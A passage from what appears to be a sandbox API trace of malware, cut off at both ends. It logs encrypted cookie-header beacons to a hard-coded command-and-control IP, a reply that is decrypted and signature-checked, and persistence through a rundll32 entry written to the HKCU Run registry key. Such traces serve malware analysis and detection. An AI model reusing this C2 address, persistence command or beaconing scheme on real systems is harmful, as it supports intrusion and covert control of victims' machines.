RAXjiCnGJD=jpijciwkfNog0jBnpMeLgO4ddKQRChWwS/CghvzNUdlSzanoSXKnnchMOOaq2v87GxSZfVpSwCRHu3guy3wl65/pR9BBd1IoccMjKCJr7VK4xPslYCkvoY+O8IpnQSuV34IO2MUZMXUBv54TSONlcT9FWO2CvbWl/9K+XkVttZ3ojYuz2Z/3uUexP5/9Xt6QoO9xu00EQBYC5CuVMIePThXO1dGvAJC766MdkQYW+uPRWaeo8MIFZDiGa7A7x8TElWt+Cl4ih/fjPB4P2JVDGtJuepRJPl67bI45WQKahZPxv1bOkB5Ks06xPU6qqQuVmappHFpfLIxK21u7pU8+DaT2mlOq0QqcX+EHtSFcmSIGTZx4QI53/Np7zkCS\r\n") returned 401 [0464.382] GetProcessHeap () returned 0x530000 [0464.382] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2b63080 | out: hHeap=0x530000) returned 1 [0464.382] GetProcessHeap () returned 0x530000 [0464.383] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2a89708 | out: hHeap=0x530000) returned 1 [0464.383] InternetOpenW (lpszAgent=0x0, dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0464.384] GetProcessHeap () returned 0x530000 [0464.384] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x530000) returned 1 [0464.384] InternetConnectW (hInternet=0xcc0004, lpszServerName="131.100.24.231", nServerPort=0x50, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x0) returned 0xcc0008 [0464.468] HttpOpenRequestW (hConnect=0xcc0008, lpszVerb=0x0, lpszObjectName="rFIVerNgyrSmXUggWdIremBTWYZCkCuRASKHzfsqJSwnaABShqhCQtgLQSSnBq", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x0, dwFlags=0x84ccf300, dwContext=0x0) returned 0xcc000c [0464.469] GetProcessHeap () returned 0x530000 [0464.469] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x530000) returned 1 [0464.469] InternetSetOptionW (hInternet=0xcc000c, dwOption=0x41, lpBuffer=0x2cf5b8*, dwBufferLength=0x4) returned 1 [0464.469] InternetQueryOptionW (in: hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0x2cf5b8, lpdwBufferLength=0x2cf5d8 | out: lpBuffer=0x2cf5b8, lpdwBufferLength=0x2cf5d8) returned 1 [0464.469] InternetSetOptionW (hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0x2cf5b8*, dwBufferLength=0x4) returned 1 [0464.469] HttpSendRequestW (hRequest=0xcc000c, lpszHeaders="Cookie: RAXjiCnGJD=jpijciwkfNog0jBnpMeLgO4ddKQRChWwS/CghvzNUdlSzanoSXKnnchMOOaq2v87GxSZfVpSwCRHu3guy3wl65/pR9BBd1IoccMjKCJr7VK4xPslYCkvoY+O8IpnQSuV34IO2MUZMXUBv54TSONlcT9FWO2CvbWl/9K+XkVttZ3ojYuz2Z/3uUexP5/9Xt6QoO9xu00EQBYC5CuVMIePThXO1dGvAJC766MdkQYW+uPRWaeo8MIFZDiGa7A7x8TElWt+Cl4ih/fjPB4P2JVDGtJuepRJPl67bI45WQKahZPxv1bOkB5Ks06xPU6qqQuVmappHFpfLIxK21u7pU8+DaT2mlOq0QqcX+EHtSFcmSIGTZx4QI53/Np7zkCS\r\n", dwHeadersLength=0xffffffff, lpOptional=0x0*, dwOptionalLength=0x0) returned 1 [0465.590] HttpQueryInfoW (in: hRequest=0xcc000c, dwInfoLevel=0x20000013, lpBuffer=0x2cf490, lpdwBufferLength=0x2cf494, lpdwIndex=0x0 | out: lpBuffer=0x2cf490*, lpdwBufferLength=0x2cf494*=0x4, lpdwIndex=0x0) returned 1 [0465.590] GetProcessHeap () returned 0x530000 [0465.590] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x10000) returned 0x2b47e00 [0465.590] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2b47e00, dwNumberOfBytesToRead=0x10000, lpdwNumberOfBytesRead=0x2cf49c | out: lpBuffer=0x2b47e00*, lpdwNumberOfBytesRead=0x2cf49c*=0x1c9) returned 1 [0465.590] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2b47fc9, dwNumberOfBytesToRead=0xfe37, lpdwNumberOfBytesRead=0x2cf49c | out: lpBuffer=0x2b47fc9*, lpdwNumberOfBytesRead=0x2cf49c*=0x0) returned 1 [0465.590] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0465.590] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0465.590] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0465.590] BCryptDecrypt (in: hKey=0x5bd870, pbInput=0x2b47e00, cbInput=0x60, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x0, cbOutput=0x0, pcbResult=0x2cf51c, dwFlags=0x1 | out: hKey=0x5bd870, pbIV=0x0, pbOutput=0x0, pcbResult=0x2cf51c) returned 0x0 [0465.590] GetProcessHeap () returned 0x530000 [0465.591] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x60) returned 0x2a76420 [0465.591] BCryptDecrypt (in: hKey=0x5bd870, pbInput=0x2b47e00, cbInput=0x60, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2a76420, cbOutput=0x60, pcbResult=0x2cf51c, dwFlags=0x1 | out: hKey=0x5bd870, pbIV=0x0, pbOutput=0x2a76420, pcbResult=0x2cf51c) returned 0x0 [0465.591] GetProcessHeap () returned 0x530000 [0465.591] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x10) returned 0x2bd7140 [0465.591] GetProcessHeap () returned 0x530000 [0465.591] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x40) returned 0x2acc858 [0465.591] BCryptOpenAlgorithmProvider (in: phAlgorithm=0x2cf498, pszAlgId="SHA256", pszImplementation="Microsoft Primitive Provider", dwFlags=0x0 | out: phAlgorithm=0x2cf498) returned 0x0 [0465.592] GetProcessHeap () returned 0x530000 [0465.592] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2bd7140 | out: hHeap=0x530000) returned 1 [0465.592] GetProcessHeap () returned 0x530000 [0465.593] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2acc858 | out: hHeap=0x530000) returned 1 [0465.593] GetProcessHeap () returned 0x530000 [0465.593] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x20) returned 0x2b62e28 [0465.593] BCryptGetProperty (in: hObject=0x5e0090, pszProperty="ObjectLength", pbOutput=0x2cf4a0, cbOutput=0x4, pcbResult=0x2cf4a4, dwFlags=0x0 | out: pbOutput=0x2cf4a0, pcbResult=0x2cf4a4) returned 0x0 [0465.593] GetProcessHeap () returned 0x530000 [0465.593] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2b62e28 | out: hHeap=0x530000) returned 1 [0465.593] GetProcessHeap () returned 0x530000 [0465.593] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0xb2) returned 0x2a7ac48 [0465.593] BCryptCreateHash (in: hAlgorithm=0x5e0090, phHash=0x2cf494, pbHashObject=0x2a7ac48, cbHashObject=0xb2, pbSecret=0x0, cbSecret=0x0, dwFlags=0x0 | out: hAlgorithm=0x5e0090, phHash=0x2cf494, pbHashObject=0x2a7ac48) returned 0x0 [0465.593] BCryptHashData (in: hHash=0x2a7ac50, pbInput=0x2a76468, cbInput=0x8, dwFlags=0x0 | out: hHash=0x2a7ac50) returned 0x0 [0465.593] BCryptFinishHash (in: hHash=0x2a7ac50, pbOutput=0x2cf510, cbOutput=0x20, dwFlags=0x0 | out: hHash=0x2a7ac50, pbOutput=0x2cf510) returned 0x0 [0465.593] BCryptDestroyHash (in: hHash=0x2a7ac50 | out: hHash=0x2a7ac50) returned 0x0 [0465.593] GetProcessHeap () returned 0x530000 [0465.594] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2a7ac48 | out: hHeap=0x530000) returned 1 [0465.594] BCryptCloseAlgorithmProvider (in: hAlgorithm=0x5e0090, dwFlags=0x0 | out: hAlgorithm=0x5e0090) returned 0x0 [0465.594] BCryptVerifySignature (hKey=0x584858, pPaddingInfo=0x0, pbHash=0x2cf510, cbHash=0x20, pbSignature=0x2a76424, cbSignature=0x40, dwFlags=0x0) returned 0x0 [0465.596] GetProcessHeap () returned 0x530000 [0465.596] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x8) returned 0x2a6c650 [0465.596] GetProcessHeap () returned 0x530000 [0465.596] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2a76420 | out: hHeap=0x530000) returned 1 [0465.596] GetProcessHeap () returned 0x530000 [0465.597] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2b47e00 | out: hHeap=0x530000) returned 1 [0465.597] GetProcessHeap () returned 0x530000 [0465.597] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2a49848 | out: hHeap=0x530000) returned 1 [0465.597] GetProcessHeap () returned 0x530000 [0465.597] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x5d8258 | out: hHeap=0x530000) returned 1 [0465.597] GetProcessHeap () returned 0x530000 [0465.598] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x530000) returned 1 [0465.598] SHGetFolderPathW (in: hwnd=0x0, csidl=41, hToken=0x0, dwFlags=0x0, pszPath=0x2cf5d4 | out: pszPath="C:\\Windows\\SysWOW64") returned 0x0 [0465.598] GetProcessHeap () returned 0x530000 [0465.598] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x38) returned 0x2a83be0 [0465.598] _snwprintf (in: _Dest=0x2cf1c4, _Count=0x104, _Format="%s\\rundll32.exe \"%s\\%s\",%s" | out: _Dest="C:\\Windows\\SysWOW64\\rundll32.exe \"C:\\Users\\kEecfMwgj\\AppData\\Local\\Oxeedtbi\\tfnfdhfu.kqr\",NkAtcmP") returned 97 [0465.598] GetProcessHeap () returned 0x530000 [0465.598] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2a83be0 | out: hHeap=0x530000) returned 1 [0465.598] GetProcessHeap () returned 0x530000 [0465.599] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x60) returned 0x2a76420 [0465.599] RegCreateKeyExW (in: hKey=0x80000001, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x2cf1b0, lpdwDisposition=0x0 | out: phkResult=0x2cf1b0*=0x670, lpdwDisposition=0x0) returned 0x0 [0465.599] GetProcessHeap () returned 0x530000 [0465.599] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2a76420 | out: hHeap=0x530000) returned 1 [0465.599] lstrlenW (lpString="C:\\Windows\\SysWOW64\\rundll32.exe \"C:\\Users\\kEecfMwgj\\AppData\\Local\\Oxeedtbi\\tfnfdhfu.kqr\",NkAtcmP") returned 97 [0465.599] RegSetValueExW (in: hKey=0x670, lpValueName="tfnfdhfu.kqr", Reserved=0x0, dwType=0x1, lpData="C:\\Windows\\SysWOW64\\rundll32.exe \"C:\\Users\\kEecfMwgj\\AppData\\Local\\Oxeedtbi\\tfnfdhfu.kqr\",NkAtcmP", cbData=0xc4 | out: lpData="C:\\Windows\\SysWOW64\\rundll32.exe \"C:\\Users\\kEecfMwgj\\AppData\\Local\\Oxeedtbi\\tfnfdhfu.kqr\",NkAtcmP") returned 0x0 [0465.600] RegCloseKey (hKey=0x670) returned 0x0 [0465.600] GetProcessHeap () returned 0x530000 [0465.600] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2a6c650 | out: hHeap=0x530000) returned 1 [0465.600] GetProcessHeap () returned 0x530000 [0465.601] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2aceb70 | out: hHeap=0x530000) returned 1 [0465.601] WaitForSingleObject (hHandle=0x1a8, dwMilliseconds=0xeef7b) returned 0x102 [0475.654] GetProcessHeap () returned 0x530000 [0475.654] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x10) returned 0x2bd7140 [0475.655] _snwprintf (in: _Dest=0x2cf5d0, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\Users\\kEecfMwgj\\AppData\\Local\\Oxeedtbi\\tfnfdhfu.kqr") returned 54 [0475.655] GetProcessHeap () returned 0x530000 [0475.655] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2bd7140 | out: hHeap=0x530000) returned 1 [0475.655] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\AppData\\Local\\Oxeedtbi\\tfnfdhfu.kqr") returned="tfnfdhfu.kqr" [0475.655] GetProcessHeap () returned 0x530000 [0475.655] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x10) returned 0x2bd7140 [0475.655] _snwprintf (in: _Dest=0x2cf040, _Count=0x104, _Format="%s\\*" | out: _Dest="C:\\Users\\kEecfMwgj\\AppData\\Local\\Oxeedtbi\\\\*") returned 44 [0475.655] GetProcessHeap () returned 0x530000 [0475.655] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2bd7140 | out: hHeap=0x530000) returned 1 [0475.655] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Oxeedtbi\\\\*", lpFindFileData=0x2cf248 | out: lpFindFileData=0x2cf248*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7de3c200, ftCreationTime.dwHighDateTime=0x1d806e7, ftLastAccessTime.dwLowDateTime=0x841515c0, ftLastAccessTime.dwHighDateTime=0x1d806e7, ftLastWriteTime.dwLowDateTime=0x841515c0, ftLastWriteTime.dwHighDateTime=0x1d806e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6b002e, dwReserved1=0x720071, cFileName=".", cAlternateFileName="")) returned 0x2a83be0 [0475.658] FindNextFileW (in: hFindFile=0x2a83be0, lpFindFileData=0x2cf248 | out: lpFindFileData=0x2cf248*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7de3c200, ftCreationTime.dwHighDateTime=0x1d806e7, ftLastAccessTime.dwLowDateTime=0x841515c0, ftLastAccessTime.dwHighDateTime=0x1d806e7, ftLastWriteTime.dwLowDateTime=0x841515c0, ftLastWriteTime.dwHighDateTime=0x1d806e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6b002e, dwReserved1=0x720071, cFileName="..", cAlternateFileName="")) returned 1 [0475.658] FindNextFileW (in: hFindFile=0x2a83be0, lpFindFileData=0x2cf248 | out: lpFindFileData=0x2cf248*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6a27bcb0, ftCreationTime.dwHighDateTime=0x1d80167, ftLastAccessTime.dwLowDateTime=0x6a27bcb0, ftLastAccessTime.dwHighDateTime=0x1d80167, ftLastWriteTime.dwLowDateTime=0x6a27bcb0, ftLastWriteTime.dwHighDateTime=0x1d80167, nFileSizeHigh=0x0, nFileSizeLow=0x67627, dwReserved0=0x6b002e, dwReserved1=0x720071, cFileName="tfnfdhfu.kqr", cAlternateFileName="")) returned 1 [0475.658] PathFindFileNameW (pszPath="Oxeedtbi\\tfnfdhfu.kqr") returned="tfnfdhfu.kqr" [0475.658] lstrcmpiW (lpString1="tfnfdhfu.kqr", lpString2="tfnfdhfu.kqr") returned 0 [0475.658] FindNextFileW (in: hFindFile=0x2a83be0, lpFindFileData=0x2cf248 | out: lpFindFileData=0x2cf248*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6a27bcb0, ftCreationTime.dwHighDateTime=0x1d80167, ftLastAccessTime.dwLowDateTime=0x6a27bcb0, ftLastAccessTime.dwHighDateTime=0x1d80167, ftLastWriteTime.dwLowDateTime=0x6a27bcb0, ftLastWriteTime.dwHighDateTime=0x1d80167, nFileSizeHigh=0x0, nFileSizeLow=0x67627, dwReserved0=0x6b002e, dwReserved1=0x720071, cFileName="tfnfdhfu.kqr", cAlternateFileName="")) returned 0 [0475.658] FindClose (in: hFindFile=0x2a83be0 | out: hFindFile=0x2a83be0) returned 1 [0475.659] GetProcessHeap () returned 0x530000 [0475.659] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x2f) returned 0x2aceb70 [0475.659] GetProcessHeap () returned 0x530000 [0475.659] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x10) returned 0x2bd7140 [0475.659] GetProcessHeap () returned 0x530000 [0475.659] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x40) returned 0x2acc858 [0475.659] BCryptOpenAlgorithmProvider (in: phAlgorithm=0x2cf4b0, pszAlgId="SHA256", pszImplementation="Microsoft Primitive Provider", dwFlags=0x0 | out: phAlgorithm=0x2cf4b0) returned 0x0 [0475.660] GetProcessHeap () returned 0x530000 [0475.660] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2bd7140 | out: hHeap=0x530000) returned 1 [0475.660] GetProcessHeap () returned 0x530000 [0475.661] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2acc858 | out: hHeap=0x530000) returned 1 [0475.661] GetProcessHeap () returned 0x530000 [0475.661] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x20) returned 0x2b62e28 [0475.661] BCryptGetProperty (in: hObject=0x5e0090, pszProperty="ObjectLength", pbOutput=0x2cf4b8, cbOutput=0x4, pcbResult=0x2cf4bc, dwFlags=0x0 | out: pbOutput=0x2cf4b8, pcbResult=0x2cf4bc) returned 0x0 [0475.661] GetProcessHeap () returned 0x530000 [0475.662] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2b62e28 | out: hHeap=0x530000) returned 1 [0475.662] GetProcessHeap () returned 0x530000 [0475.662] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0xb2) returned 0x2a7ac48 [0475.662] BCryptCreateHash (in: hAlgorithm=0x5e0090, phHash=0x2cf4ac, pbHashObject=0x2a7ac48, cbHashObject=0xb2, pbSecret=0x0, cbSecret=0x0, dwFlags=0x0 | out: hAlgorithm=0x5e0090, phHash=0x2cf4ac, pbHashObject=0x2a7ac48) returned 0x0 [0475.662] BCryptHashData (in: hHash=0x2a7ac50, pbInput=0x2aceb70, cbInput=0x2f, dwFlags=0x0 | out: hHash=0x2a7ac50) returned 0x0 [0475.662] BCryptFinishHash (in: hHash=0x2a7ac50, pbOutput=0x2cf5e0, cbOutput=0x20, dwFlags=0x0 | out: hHash=0x2a7ac50, pbOutput=0x2cf5e0) returned 0x0 [0475.662] BCryptDestroyHash (in: hHash=0x2a7ac50 | out: hHash=0x2a7ac50) returned 0x0 [0475.662] GetProcessHeap () returned 0x530000 [0475.662] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2a7ac48 | out: hHeap=0x530000) returned 1 [0475.662] BCryptCloseAlgorithmProvider (in: hAlgorithm=0x5e0090, dwFlags=0x0 | out: hAlgorithm=0x5e0090) returned 0x0 [0475.663] GetProcessHeap () returned 0x530000 [0475.663] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x5b) returned 0x2a76420 [0475.663] BCryptEncrypt (in: hKey=0x5bd870, pbInput=0x2a76420, cbInput=0x5b, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x0, cbOutput=0x0, pcbResult=0x2cf4b4, dwFlags=0x1 | out: hKey=0x5bd870, pbIV=0x0, pbOutput=0x0, pcbResult=0x2cf4b4) returned 0x0 [0475.663] GetProcessHeap () returned 0x530000 [0475.663] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x60) returned 0x2a76488 [0475.663] BCryptEncrypt (in: hKey=0x5bd870, pbInput=0x2a76420, cbInput=0x5b, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2a76488, cbOutput=0x60, pcbResult=0x2cf4b4, dwFlags=0x1 | out: hKey=0x5bd870, pbIV=0x0, pbOutput=0x2a76488, pcbResult=0x2cf4b4) returned 0x0 [0475.663] GetProcessHeap () returned 0x530000 [0475.663] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0xe4) returned 0x2b5be28 [0475.663] GetProcessHeap () returned 0x530000 [0475.664] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2a76488 | out: hHeap=0x530000) returned 1 [0475.664] GetProcessHeap () returned 0x530000 [0475.664] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2a76420 | out: hHeap=0x530000) returned 1 [0475.664] CryptBinaryToStringW (in: pbBinary=0x2b5be28, cbBinary=0xe4, dwFlags=0x40000001, pszString=0x0, pcchString=0x2cf504 | out: pszString=0x0, pcchString=0x2cf504) returned 1 [0475.664] GetProcessHeap () returned 0x530000 [0475.664] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x262) returned 0x2a89708 [0475.664] CryptBinaryToStringW (in: pbBinary=0x2b5be28, cbBinary=0xe4, dwFlags=0x40000001, pszString=0x2a89708, pcchString=0x2cf504 | out: pszString="jpijciwkfNog0jBnpMeLgO4ddKQRChWwS/CghvzNUdlSzanoSXKnnchMOOaq2v87GxSZfVpSwCRHu3guy3wl65/pR9BBd1IoccMjKCJr7VK4xPslYCkvoY+O8IpnQSuV34IO2MUZMXUBv54TSONlcT9FWO2CvbWl/9K+XkVttZ3ojYuz2Z/3uUexP5/9Xt6QoO9xu00EQBYC5CuVMIePToskqgDVUx47wCpUBFb9DUFiHf/F3eyjY+WOT658SFxVhMP511WjpKqxSM/OI8/VvhKUwXU7gyJQnsP2GUPl2roGPbE2", pcchString=0x2cf504) returned 1 [0475.664] GetProcessHeap () returned 0x530000 [0475.664] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x4000) returned 0x5d8258 [0475.664] GetProcessHeap () returned 0x530000 [0475.665] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x20) returned 0x2b630d0 [0475.665] _snwprintf (in: _Dest=0x5d8258, _Count=0x4000, _Format="Cookie: %s=%s\r\n" | out: _Dest="Cookie: hFXrL=jpijciwkfNog0jBnpMeLgO4ddKQRChWwS/CghvzNUdlSzanoSXKnnchMOOaq2v87GxSZfVpSwCRHu3guy3wl65/pR9BBd1IoccMjKCJr7VK4xPslYCkvoY+O8IpnQSuV34IO2MUZMXUBv54TSONlcT9FWO2CvbWl/9K+XkVttZ3ojYuz2Z/3uUexP5/9Xt6QoO9xu00EQBYC5CuVMIePToskqgDVUx47wCpUBFb9DUFiHf/F3eyjY+WOT658SFxVhMP511WjpKqxSM/OI8/VvhKUwXU7gyJQnsP2GUPl2roGPbE2\r\n") returned 320 [0475.665] GetProcessHeap () returned 0x530000 [0475.665] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2b630d0 | out: hHeap=0x530000) returned 1 [0475.665] GetProcessHeap () returned 0x530000 [0475.665] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2a89708 | out: hHeap=0x530000) returned 1 [0475.665] InternetOpenW (lpszAgent=0x0, dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0475.666] GetProcessHeap () returned 0x530000 [0475.666] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x530000) returned 1 [0475.666] InternetConnectW (hInternet=0xcc0004, lpszServerName="131.100.24.231", nServerPort=0x50, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x0) returned 0xcc0008 [0475.668] HttpOpenRequestW (hConnect=0xcc0008, lpszVerb=0x0, lpszObjectName="IyfASJCANyEeMSEnpXpaRFmYWRdzZpmrrpAhUpzOSuzKLlOpcGsaP", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x0, dwFlags=0x84ccf300, dwContext=0x0) returned 0xcc000c [0475.668] GetProcessHeap () returned 0x530000 [0475.668] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x530000) returned 1 [0475.668] InternetSetOptionW (hInternet=0xcc000c, dwOption=0x41, lpBuffer=0x2cf5b8*, dwBufferLength=0x4) returned 1 [0475.668] InternetQueryOptionW (in: hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0x2cf5b8, lpdwBufferLength=0x2cf5d8 | out: lpBuffer=0x2cf5b8, lpdwBufferLength=0x2cf5d8) returned 1 [0475.669] InternetSetOptionW (hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0x2cf5b8*, dwBufferLength=0x4) returned 1 [0475.669] HttpSendRequestW (hRequest=0xcc000c, lpszHeaders="Cookie: hFXrL=jpijciwkfNog0jBnpMeLgO4ddKQRChWwS/CghvzNUdlSzanoSXKnnchMOOaq2v87GxSZfVpSwCRHu3guy3wl65/pR9BBd1IoccMjKCJr7VK4xPslYCkvoY+O8IpnQSuV34IO2MUZMXUBv54TSONlcT9FWO2CvbWl/9K+XkVttZ3ojYuz2Z/3uUexP5/9Xt6QoO9xu00EQBYC5CuVMIePToskqgDVUx47wCpUBFb9DUFiHf/F3eyjY+WOT658SFxVhMP511WjpKqxSM/OI8/VvhKUwXU7gyJQnsP2GUPl2roGPbE2\r\n", dwHeadersLength=0xffffffff, lpOptional=0x0*, dwOptionalLength=0x0) returned 1 [0476.806] HttpQueryInfoW (in: hRequest=0xcc000c, dwInfoLevel=0x20000013, lpBuffer=0x2cf490, lpdwBufferLength=0x2cf494, lpdwIndex=0x0 | out: lpBuffer=0x2cf490*, lpdwBufferLength=0x2cf494*=0x4, lpdwIndex=0x0) returned 1 [0476.807] GetProcessHeap () returned 0x530000 [0476.807] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x10000) returned 0x2b47e00 [0476.807] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2b47e00, dwNumberOfBytesToRead=0x10000, lpdwNumberOfBytesRead=0x2cf49c | out: lpBuffer=0x2b47e00*, lpdwNumberOfBytesRead=0x2cf49c*=0x39b) returned 1 [0476.808] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2b4819b, dwNumberOfBytesToRead=0xfc65, lpdwNumberOfBytesRead=0x2cf49c | out: lpBuffer=0x2b4819b*, lpdwNumberOfBytesRead=0x2cf49c*=0x0) returned 1 [0476.808] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0476.808] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0476.808] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0476.808] BCryptDecrypt (in: hKey=0x5bd870, pbInput=0x2b47e00, cbInput=0x60, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x0, cbOutput=0x0, pcbResult=0x2cf51c, dwFlags=0x1 | out: hKey=0x5bd870, pbIV=0x0, pbOutput=0x0, pcbResult=0x2cf51c) returned 0x0 [0476.808] GetProcessHeap () returned 0x530000 [0476.808] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x60) returned 0x2a76420 [0476.808] BCryptDecrypt (in: hKey=0x5bd870, pbInput=0x2b47e00, cbInput=0x60, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2a76420, cbOutput=0x60, pcbResult=0x2cf51c, dwFlags=0x1 | out: hKey=0x5bd870, pbIV=0x0, pbOutput=0x2a76420, pcbResult=0x2cf51c) returned 0x0 [0476.808] GetProcessHeap () returned 0x530000 [0476.808] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x10) returned 0x2bd72f0 [0476.808] GetProcessHeap () returned 0x530000 [0476.808] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x40) returned 0x2acc858 [0476.808] BCryptOpenAlgorithmProvider (in: phAlgorithm=0x2cf498, pszAlgId="SHA256", pszImplementation="Microsoft Primitive Provider", dwFlags=0x0 | out: phAlgorithm=0x2cf498) returned 0x0 [0476.810] GetProcessHeap () returned 0x530000 [0476.810] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2bd72f0 | out: hHeap=0x530000) returned 1 [0476.810] GetProcessHeap () returned 0x530000 [0476.810] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2acc858 | out: hHeap=0x530000) returned 1 [0476.810] GetProcessHeap () returned 0x530000 [0476.810] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x20) returned 0x2b62f90 [0476.810] BCryptGetProperty (in: hObject=0x5e0090, pszProperty="ObjectLength", pbOutput=0x2cf4a0, cbOutput=0x4, pcbResult=0x2cf4a4, dwFlags=0x0 | out: pbOutput=0x2cf4a0, pcbResult=0x2cf4a4) returned 0x0 [0476.810] GetProcessHeap () returned 0x530000 [0476.810] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2b62f90 | out: hHeap=0x530000) returned 1 [0476.811] GetProcessHeap () returned 0x530000 [0476.811] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0xb2) returned 0x2a7ac48 [0476.811] BCryptCreateHash (in: hAlgorithm=0x5e0090, phHash=0x2cf494, pbHashObject=0x2a7ac48, cbHashObject=0xb2, pbSecret=0x0, cbSecret=0x0, dwFlags=0x0 | out: hAlgorithm=0x5e0090, phHash=0x2cf494, 